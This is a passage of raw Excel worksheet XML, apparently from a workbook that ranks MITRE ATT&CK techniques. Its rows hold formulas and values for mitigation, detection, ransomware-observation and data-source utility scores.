        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K263" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L263" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M263" s="37">
        <v>0</v>
      </c>
      <c r="N263" s="56">
        <v>0</v>
      </c>
      <c r="O263" s="56">
        <v>0</v>
      </c>
      <c r="P263" s="56">
        <v>0</v>
      </c>
      <c r="Q263" s="56">
        <v>0</v>
      </c>
      <c r="R263" s="57" t="s">
        <v>931</v>
      </c>
      <c r="S263" s="57">
        <v>15</v>
      </c>
      <c r="T263" s="57" t="s">
        <v>932</v>
      </c>
      <c r="U263" s="57">
        <v>24</v>
      </c>
      <c r="V263" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.37142861904761909</v>
      </c>
      <c r="W263" s="37">
        <v>39</v>
      </c>
      <c r="X263" s="37">
        <v>0.70909100000000003</v>
      </c>
      <c r="Y263" s="37">
        <v>0.70909100000000003</v>
      </c>
      <c r="Z263" s="37">
        <v>0</v>
      </c>
      <c r="AA263" s="37">
        <v>0</v>
      </c>
      <c r="AB263" s="37">
        <v>0</v>
      </c>
      <c r="AC263" s="37"/>
      <c r="AD263" s="50" t="s">
        <v>933</v>
      </c>
      <c r="AE263" s="37" t="str" cm="1">
        <f t="array" ref="AE263">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD263)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF263" s="37">
        <v>259</v>
      </c>
      <c r="AG263" s="37" t="str" cm="1">
        <f t="array" ref="AG263">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD263)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH263" s="37">
        <v>259</v>
      </c>
      <c r="AI263" s="37" t="str" cm="1">
        <f t="array" ref="AI263">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD263)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ263" s="37">
        <v>259</v>
      </c>
      <c r="AK263" s="37" t="str" cm="1">
        <f t="array" ref="AK263">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD263)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL263" s="37">
        <v>259</v>
      </c>
      <c r="AM263" s="37" t="str" cm="1">
        <f t="array" ref="AM263">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD263)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN263" s="37">
        <v>0</v>
      </c>
      <c r="AO263" s="37">
        <v>1</v>
      </c>
      <c r="AP263" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ263" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>162.95715931746034</v>
      </c>
      <c r="AR263" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS263" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT263" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU26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3.9037418885109605</v>
      </c>
    </row>
    <row r="264" spans="1:47" ht="34">
      <c r="A264" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B264" s="37">
        <f t="shared" si="4"/>
        <v>490.7571924285715</v>
      </c>
      <c r="C264" s="37" t="s">
        <v>936</v>
      </c>
      <c r="D264" s="50" t="s">
        <v>930</v>
      </c>
      <c r="E264" s="37" t="s">
        <v>937</v>
      </c>
      <c r="F264" s="37">
        <v>1</v>
      </c>
      <c r="G264" s="37">
        <v>1</v>
      </c>
      <c r="H264" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I264" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J264" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K264" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L264" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M264" s="37">
        <v>0</v>
      </c>
      <c r="N264" s="56">
        <v>0</v>
      </c>
      <c r="O264" s="56">
        <v>0</v>
      </c>
      <c r="P264" s="56">
        <v>0</v>
      </c>
      <c r="Q264" s="56">
        <v>0</v>
      </c>
      <c r="R264" s="57" t="s">
        <v>931</v>
      </c>
      <c r="S264" s="57">
        <v>15</v>
      </c>
      <c r="T264" s="57" t="s">
        <v>932</v>
      </c>
      <c r="U264" s="57">
        <v>24</v>
      </c>
      <c r="V264" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.37142861904761909</v>
      </c>
      <c r="W264" s="37">
        <v>39</v>
      </c>
      <c r="X264" s="37">
        <v>0.70909100000000003</v>
      </c>
      <c r="Y264" s="37">
        <v>0.70909100000000003</v>
      </c>
      <c r="Z264" s="37">
        <v>0</v>
      </c>
      <c r="AA264" s="37">
        <v>0</v>
      </c>
      <c r="AB264" s="37">
        <v>0</v>
      </c>
      <c r="AC264" s="37"/>
      <c r="AD264" s="50" t="s">
        <v>933</v>
      </c>
      <c r="AE264" s="37" t="str" cm="1">
        <f t="array" ref="AE264">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD264)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF264" s="37">
        <v>260</v>
      </c>
      <c r="AG264" s="37" t="str" cm="1">
        <f t="array" ref="AG264">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD264)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH264" s="37">
        <v>260</v>
      </c>
      <c r="AI264" s="37" t="str" cm="1">
        <f t="array" ref="AI264">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD264)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ264" s="37">
        <v>260</v>
      </c>
      <c r="AK264" s="37" t="str" cm="1">
        <f t="array" ref="AK264">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD264)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL264" s="37">
        <v>260</v>
      </c>
      <c r="AM264" s="37" t="str" cm="1">
        <f t="array" ref="AM264">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD264)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN264" s="37">
        <v>0</v>
      </c>
      <c r="AO264" s="37">
        <v>0</v>
      </c>
      <c r="AP264" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ264" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>163.58573080952382</v>
      </c>
      <c r="AR264" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS264" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT264" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU26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65" spans="1:47" ht="34">
      <c r="A265" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B265" s="37">
        <f t="shared" si="4"/>
        <v>104.5</v>
      </c>
      <c r="C265" s="37" t="s">
        <v>938</v>
      </c>
      <c r="D265" s="50" t="s">
        <v>930</v>
      </c>
      <c r="E265" s="37" t="s">
        <v>939</v>
      </c>
      <c r="F265" s="37">
        <v>1</v>
      </c>
      <c r="G265" s="37">
        <v>1</v>
      </c>
      <c r="H265" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I265" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J265" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K265" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L265" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M265" s="37">
        <v>0</v>
      </c>
      <c r="N265" s="56">
        <v>0</v>
      </c>
      <c r="O265" s="56">
        <v>0</v>
      </c>
      <c r="P265" s="56">
        <v>0</v>
      </c>
      <c r="Q265" s="56">
        <v>0</v>
      </c>
      <c r="R265" s="57"/>
      <c r="S265" s="57">
        <v>0</v>
      </c>
      <c r="T265" s="57" t="s">
        <v>940</v>
      </c>
      <c r="U265" s="57">
        <v>0</v>
      </c>
      <c r="V265" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W265" s="37">
        <v>0</v>
      </c>
      <c r="X265" s="37">
        <v>0</v>
      </c>
      <c r="Y265" s="37">
        <v>0</v>
      </c>
      <c r="Z265" s="37">
        <v>0</v>
      </c>
      <c r="AA265" s="37">
        <v>0</v>
      </c>
      <c r="AB265" s="37">
        <v>0</v>
      </c>
      <c r="AC265" s="37"/>
      <c r="AD265" s="50" t="s">
        <v>933</v>
      </c>
      <c r="AE265" s="37" t="str" cm="1">
        <f t="array" ref="AE265">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD265)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF265" s="37">
        <v>261</v>
      </c>
      <c r="AG265" s="37" t="str" cm="1">
        <f t="array" ref="AG265">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD265)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH265" s="37">
        <v>261</v>
      </c>
      <c r="AI265" s="37" t="str" cm="1">
        <f t="array" ref="AI265">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD265)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ265" s="37">
        <v>261</v>
      </c>
      <c r="AK265" s="37" t="str" cm="1">
        <f t="array" ref="AK265">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD265)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL265" s="37">
        <v>261</v>
      </c>
      <c r="AM265" s="37" t="str" cm="1">
        <f t="array" ref="AM265">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD265)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN265" s="37">
        <v>0</v>
      </c>
      <c r="AO265" s="37"/>
      <c r="AP265" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ265" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>34.833333333333336</v>
      </c>
      <c r="AR265" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS265" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT265" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU26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66" spans="1:47" ht="34">
      <c r="A266" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B266" s="37">
        <f t="shared" si="4"/>
        <v>271.08582690476192</v>
      </c>
      <c r="C266" s="37" t="s">
        <v>941</v>
      </c>
      <c r="D266" s="50" t="s">
        <v>942</v>
      </c>
      <c r="E266" s="37"/>
      <c r="F266" s="37">
        <v>1</v>
      </c>
      <c r="G266" s="37">
        <v>1</v>
      </c>
      <c r="H266" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I266" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J266" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K266" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L266" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M266" s="37">
        <v>6.0419999999999996E-3</v>
      </c>
      <c r="N266" s="56">
        <v>0</v>
      </c>
      <c r="O266" s="56">
        <v>17</v>
      </c>
      <c r="P266" s="56">
        <v>0</v>
      </c>
      <c r="Q266" s="56">
        <v>1</v>
      </c>
      <c r="R266" s="57">
        <v>2.7</v>
      </c>
      <c r="S266" s="57">
        <v>1</v>
      </c>
      <c r="T266" s="57" t="s">
        <v>943</v>
      </c>
      <c r="U266" s="57">
        <v>6</v>
      </c>
      <c r="V266" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.15238109523809523</v>
      </c>
      <c r="W266" s="37">
        <v>7</v>
      </c>
      <c r="X266" s="37">
        <v>0.127273</v>
      </c>
      <c r="Y266" s="37">
        <v>0.127273</v>
      </c>
      <c r="Z266" s="37">
        <v>18</v>
      </c>
      <c r="AA266" s="37">
        <v>0.18</v>
      </c>
      <c r="AB266" s="37">
        <v>0.18</v>
      </c>
      <c r="AC266" s="37"/>
      <c r="AD266" s="50" t="s">
        <v>418</v>
      </c>
      <c r="AE266" s="37" t="str" cm="1">
        <f t="array" ref="AE266">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD266)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF266" s="37">
        <v>262</v>
      </c>
      <c r="AG266" s="37" t="str" cm="1">
        <f t="array" ref="AG266">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD266)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH266" s="37">
        <v>262</v>
      </c>
      <c r="AI266" s="37" t="str" cm="1">
        <f t="array" ref="AI266">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD266)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ266" s="37">
        <v>262</v>
      </c>
      <c r="AK266" s="37" t="str" cm="1">
        <f t="array" ref="AK266">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD266)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL266" s="37">
        <v>262</v>
      </c>
      <c r="AM266" s="37" t="str" cm="1">
        <f t="array" ref="AM266">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD266)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN266" s="37">
        <v>0</v>
      </c>
      <c r="AO266" s="37">
        <v>0</v>
      </c>
      <c r="AP266" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ266" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>90.361942301587305</v>
      </c>
      <c r="AR266" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS266" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT266" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU26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67" spans="1:47" ht="34">
      <c r="A267" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B267" s="37">
        <f t="shared" si="4"/>
        <v>185.52872185714287</v>
      </c>
      <c r="C267" s="37" t="s">
        <v>944</v>
      </c>
      <c r="D267" s="50" t="s">
        <v>942</v>
      </c>
      <c r="E267" s="37" t="s">
        <v>945</v>
      </c>
      <c r="F267" s="37">
        <v>1</v>
      </c>
      <c r="G267" s="37">
        <v>1</v>
      </c>
      <c r="H267" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I267" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J267" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K267" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L267" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M267" s="37">
        <v>0</v>
      </c>
      <c r="N267" s="56">
        <v>0</v>
      </c>
      <c r="O267" s="56">
        <v>2</v>
      </c>
      <c r="P267" s="56">
        <v>0</v>
      </c>
      <c r="Q267" s="56">
        <v>0</v>
      </c>
      <c r="R267" s="57">
        <v>2.7</v>
      </c>
      <c r="S267" s="57">
        <v>1</v>
      </c>
      <c r="T267" s="57" t="s">
        <v>943</v>
      </c>
      <c r="U267" s="57">
        <v>6</v>
      </c>
      <c r="V267" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>7.6190619047619049E-2</v>
      </c>
      <c r="W267" s="37">
        <v>7</v>
      </c>
      <c r="X267" s="37">
        <v>0.127273</v>
      </c>
      <c r="Y267" s="37">
        <v>0.127273</v>
      </c>
      <c r="Z267" s="37">
        <v>2</v>
      </c>
      <c r="AA267" s="37">
        <v>0.02</v>
      </c>
      <c r="AB267" s="37">
        <v>0.02</v>
      </c>
      <c r="AC267" s="37"/>
      <c r="AD267" s="50" t="s">
        <v>418</v>
      </c>
      <c r="AE267" s="37" t="str" cm="1">
        <f t="array" ref="AE267">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD267)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF267" s="37">
        <v>263</v>
      </c>
      <c r="AG267" s="37" t="str" cm="1">
        <f t="array" ref="AG267">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD267)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH267" s="37">
        <v>263</v>
      </c>
      <c r="AI267" s="37" t="str" cm="1">
        <f t="array" ref="AI267">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD267)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ267" s="37">
        <v>263</v>
      </c>
      <c r="AK267" s="37" t="str" cm="1">
        <f t="array" ref="AK267">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD267)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL267" s="37">
        <v>263</v>
      </c>
      <c r="AM267" s="37" t="str" cm="1">
        <f t="array" ref="AM267">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD267)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN267" s="37">
        <v>0</v>
      </c>
      <c r="AO267" s="37">
        <v>0</v>
      </c>
      <c r="AP267" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ267" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>61.84290728571429</v>
      </c>
      <c r="AR267" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS267" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT267" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU26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68" spans="1:47" ht="34">
      <c r="A268" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B268" s="37">
        <f t="shared" si="4"/>
        <v>120.80000000000001</v>
      </c>
      <c r="C268" s="37" t="s">
        <v>946</v>
      </c>
      <c r="D268" s="50" t="s">
        <v>947</v>
      </c>
      <c r="E268" s="37"/>
      <c r="F268" s="37">
        <v>1</v>
      </c>
      <c r="G268" s="37">
        <v>1</v>
      </c>
      <c r="H268" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I268" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J268" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K268" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L268" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M268" s="37">
        <v>0</v>
      </c>
      <c r="N268" s="56">
        <v>0</v>
      </c>
      <c r="O268" s="56">
        <v>3</v>
      </c>
      <c r="P268" s="56">
        <v>0</v>
      </c>
      <c r="Q268" s="56">
        <v>0</v>
      </c>
      <c r="R268" s="57"/>
      <c r="S268" s="57">
        <v>0</v>
      </c>
      <c r="T268" s="57"/>
      <c r="U268" s="57">
        <v>0</v>
      </c>
      <c r="V268" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>1.4285714285714284E-2</v>
      </c>
      <c r="W268" s="37">
        <v>0</v>
      </c>
      <c r="X268" s="37">
        <v>0</v>
      </c>
